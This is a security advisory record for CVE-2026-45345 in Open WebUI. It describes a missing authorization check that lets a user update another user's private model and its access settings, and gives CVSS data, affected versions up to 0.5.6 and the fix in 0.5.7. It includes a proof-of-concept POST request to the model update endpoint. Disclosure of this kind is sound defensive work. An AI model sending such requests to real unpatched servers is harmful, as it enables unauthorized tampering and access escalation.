GHSA-gm54-m39w-grjp

Source

https://github.com/advisories/GHSA-gm54-m39w-grjp

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gm54-m39w-grjp/GHSA-gm54-m39w-grjp.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-gm54-m39w-grjp

Aliases

CVE-2026-45345

Published

2026-05-14T20:21:38Z

Modified

2026-05-19T16:15:13.884732848Z

Severity

6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N CVSS Calculator

Summary

Open WebUI missing authorization check at the model update function - models from other users can be updated

Details

Summary

A user can modify another user's model even if its visibility is set to Private. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.

Details / PoC

The user Victim created a private model with the visibility set to private: grafik

The user Attacker can edit this model using the following POST request:

POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers

{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}

Request / Response grafik

Impact

A user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained.

Database specific

{
    "cwe_ids": [
        "CWE-285"
    ],
    "severity": "MODERATE",
    "github_reviewed_at": "2026-05-14T20:21:38Z",
    "github_reviewed": true,
    "nvd_published_at": "2026-05-15T22:16:54Z"
}

References

Affected packages

PyPI / open-webui

Package

Name: open-webui; View open source insights on deps.dev
Purl: pkg:pypi/open-webui

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.5.7

Affected versions

0.*

0.1.124

0.1.125

0.2.0

0.2.1

0.2.2

0.2.3

0.2.4

0.2.5

0.3.0

0.3.1

0.3.2

0.3.3

0.3.4

0.3.5

0.3.6

0.3.7

0.3.8

0.3.9

0.3.10

0.3.12

0.3.13

0.3.14

0.3.15

0.3.16

0.3.17.dev2

0.3.17.dev3

0.3.17.dev4

0.3.17.dev5

0.3.17

0.3.18

0.3.19

0.3.20

0.3.21

0.3.22

0.3.23

0.3.24

0.3.25

0.3.26

0.3.27.dev1

0.3.27.dev2

0.3.27.dev3

0.3.27

0.3.28

0.3.29

0.3.30.dev1

0.3.30.dev2

0.3.30

0.3.31.dev1

0.3.31

0.3.32

0.3.33.dev1

0.3.33

0.3.34

0.3.35

0.4.0.dev1

0.4.0.dev2

0.4.0

0.4.1

0.4.2

0.4.3

0.4.4

0.4.5

0.4.6.dev1

0.4.6

0.4.7

0.4.8

0.5.0.dev1

0.5.0.dev2

0.5.0

0.5.1

0.5.2

0.5.3.dev1

0.5.3

0.5.4

0.5.5

0.5.6

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gm54-m39w-grjp/GHSA-gm54-m39w-grjp.json"

last_known_affected_version_range

"<= 0.5.6"